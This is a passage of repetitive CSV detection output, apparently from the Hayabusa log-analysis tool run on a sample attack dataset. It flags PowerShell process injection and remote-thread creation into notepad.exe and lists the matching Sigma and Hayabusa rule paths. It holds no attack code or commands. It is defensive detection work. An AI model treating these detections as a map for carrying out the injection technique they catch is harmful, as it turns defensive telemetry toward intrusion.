Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
